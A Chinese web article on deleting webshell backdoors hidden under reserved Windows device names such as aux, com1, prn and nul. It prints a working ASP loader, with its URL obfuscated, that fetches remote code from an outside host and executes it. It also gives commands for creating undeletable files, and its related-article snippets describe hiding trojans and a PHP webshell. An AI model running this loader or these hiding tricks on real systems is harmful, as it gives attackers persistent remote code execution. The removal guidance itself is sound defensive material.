com1/lpt1/prn/nul 木马后门处理方法集合

删除命令

rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F


代码如下:

<%
'by*aming
dim amxml,amtxt,amado
amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&"/"&"b"&"o"&"t"&"/"&"c"&"o"&"n"&"f"&"i"&"g"&"."&"t"&"x"&"t"
Set amxml=CreateObject("Microsoft.XMLHTTP")
amxml.Open "Get",amtxt,False,"",""
amxml.setRequestHeader "User-Agent",amtxt
amxml.Send
set amado=Server.CreateObject("adodb.stream")
amado.Type=1
amado.Mode=3
amado.Open
amado.Write amxml.ResponseBody
amado.Position=0
amado.Type=2
amado.Charset="gb2312"
execute(amado.ReadText)
amado.Close
set amado=nothing
Set amxml=nothing
%>

近期有朋友发现自己的网站目录下多出许多类似 aux.asp com1.gupiao.asp 的文件或文件夹,无法删除!这类文件为何无法删除,怎样建立无法删除的文件,又如何删除 aux.asp 这类 无法删除的文件 呢?

在服务器中 文件夹选项 - 查看 -隐藏受保护的操作系统文件后可看到此类文件属性均为RHSA系统文件,无法删除、修改、移动。

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:aux、com1、com2、prn、con、nul 等,因为这些名字都属于设备名称,等价于一个 DOS 设备,如果我们把文件命名为这些名字,Windows 就会误以为发生重名,所以会提示“不能创建同名的文件”。

当然,有一些特殊的方法可以投机取巧,建立以这些设备名为名的文件夹,比如我们在命令提示符下执行“md E:\COM1\\”,就在E盘建了一个名叫 COM1 的文件夹。此文件夹虽然可以访问,也可以建立子文件夹,但却无法删除,在系统看来,这个 COM1文件夹就是设备。
那么,如何删除aux、com1等文件/文件夹呢?我们只要按照完整的 UNC 路径格式,就是网上邻居的路径格式,正确输入文件路径及文件名即可。比如要删除E 盘下的 aux 文件夹,可在命令提示符下执行:rd /s \\.\E:\aux,rd 带上/s 参数表示从所有子目录删除指定文件。再比如要删除 E 盘 aux文件夹下的 nul.exe 文件,在命令提示符下执行:del \\.\E:\aux\nul.exe 即可。

采用del \\.\E:\PRN\aux.asp:.jpg的方式,失败了,最后将其他jpg文件移走,使用rd方式删除整个目录 看图:

删除aux文件命令

注意尾部加“\\”不然会出现正常文件夹也出现如图中的1文件夹无法访问的情况,重启后文件夹才会消失。

其他这种文件的删除特殊文件资料。

可以在dos中删除,在开始输入以下命令:

下面是删除test用户中的null目录中所有内容

echo y|rmdir \\.\D:\freehost\test\web\nul /s

如果有一些特殊文件,如aux.com.asp无法删除,只能先备份用户的web目录(备份时不要选中有问题的文件),再用以下命令删除web目录所有内容:

echo y|rmdir \\.\D:\freehost\test\web /s

要建立这类无法删除文件的方法也很简单:

copy 123.txt \\.\d:\aux.asp

建立不可删除的文件夹:

md \\.\d:\prn\\

要删除这类‘无法删除的文件'也是有办法的,如:d:\wwwroot\web\www 是包含这些无法删除文件的目录。在执行命令前,把文件夹中需要备份的程序先移动到其他位置,然后使用以下命令可以删除。

rmdir \\.\d:\wwwroot\web\www /s /q

也可以使用下面的命令直接删除这些文件:

del \\.\d:\wwwroot\web\www\aux.asp

(0)

相关推荐

  • com1/lpt1/prn/nul 木马后门处理方法集合

    com1/lpt1/prn/nul 木马后门处理方法集合

    删除命令 rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F 复制代码 代码如下: <% 'by*aming dim amxml,amtxt,amado amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"

  • 在Real影片中放木马后门

    在Real影片中放木马后门.遇到类是情况希望大家注意 经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉!  在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,安装了一个这样的小木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事. 使用某个工具来修改影片的剪辑信息,

  • 全世界最小的php网页木马一枚 附PHP木马的防范方法

    php网页木马 复制代码 代码如下: <?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> 保存文件名: <input type="text&quo

  • 在线扫描探测检查asp站点木马后门的程序

    复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置登陆密码,使用前务必修改此密码 PASSWORD = "www.pifoo.com" '其他扫描设置 DimFileExt = "asp,cer,asa,cdx"  '文件类型扩展名列表,不在此列表的将不被扫描 maxfilesize= 51200 '500K,超过此文件大小的文件(一般不是木马)

  • C#操作IIS方法集合

    C# 操作IIS方法集合 如果在win8,win7情况下报错:未知错误(0x80005000) ----见http://www.jb51.net/article/72881.htm using System; using System.Collections; using System.Collections.Generic; using System.DirectoryServices; using System.Linq; using System.Net; using System.Tex

  • C#实现过滤sql特殊字符的方法集合

    本文实例讲述了C#实现过滤sql特殊字符的方法集合.分享给大家供大家参考,具体如下: 1. /// <summary> /// 过滤不安全的字符串 /// </summary> /// <param name="Str"></param> /// <returns></returns> public static string FilteSQLStr(string Str) { Str = Str.Replace(

  • Android中获取控件宽高的4种方法集合

    借鉴自开发艺术 1.onWindowFocusChanged 这个方法会被调用多次,在View初始化完毕后会调用,当Activity的窗口得到焦点和失去焦点都会被调用一次(Activity继续执行和暂停执行时). @Override public void onWindowFocusChanged(boolean hasFocus) { super.onWindowFocusChanged(hasFocus); if (hasFocus) { int width = view.getMeasur

  • Java实现队列的三种方法集合

    数组实现队列 //数组实现队列 class queue{ int[] a = new int[5]; int i = 0; //入队操作 public void in(int m) { a[i++] = m; } // 出队列操作 取出最前面的值 通过循环遍历把所有的数据向前一位 public int out() { int index = 0; int temp = a[0]; for(int j = 0;j < i;j++) { a[j] = a[j + 1]; } return temp;

  • 服务器中aux,com1,com2,prn,con,nul等特殊文件删除方法

    超级批处理: 复制代码 代码如下: DEL /F /A /Q \\?\%1 RD /S /Q \\?\%1 文件-另存为"统统删除.bat" (名字叫什么都可以,不过后缀一定要".bat") 然后,把要删除的文件或者目录拖放到这个bat文件的图标上就可以删除了! 单独删除木马的方法:del \\.\d:\aux\com1.asp 就可以删除这个木马了 直接删除文件夹的方法:rd /q/s \\.\d:\aux 这样整个文件夹就可以删除了 建立的该文件夹的方法:md

  • 隐藏ASP木马后门的两种方法

    1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

随机推荐